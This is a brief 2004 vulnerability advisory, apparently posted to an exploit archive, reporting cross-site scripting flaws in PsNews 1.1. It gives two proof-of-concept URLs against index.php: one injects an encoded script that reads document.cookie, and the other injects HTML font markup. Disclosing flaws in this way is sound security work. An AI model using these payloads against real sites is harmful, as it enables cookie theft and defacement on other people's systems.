PsNews 1.1 is susceptible to a cross site scripting flaw.
b4ad6f72a0a351bddc12addceefab9e8307442ce60ce749dffef0bee19e9af46
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky@nicponie.org
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|BugCross-Site Scripting (XSS) w PsNews 1.1 |
-----------------------------------------------
Exploit:
a)
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/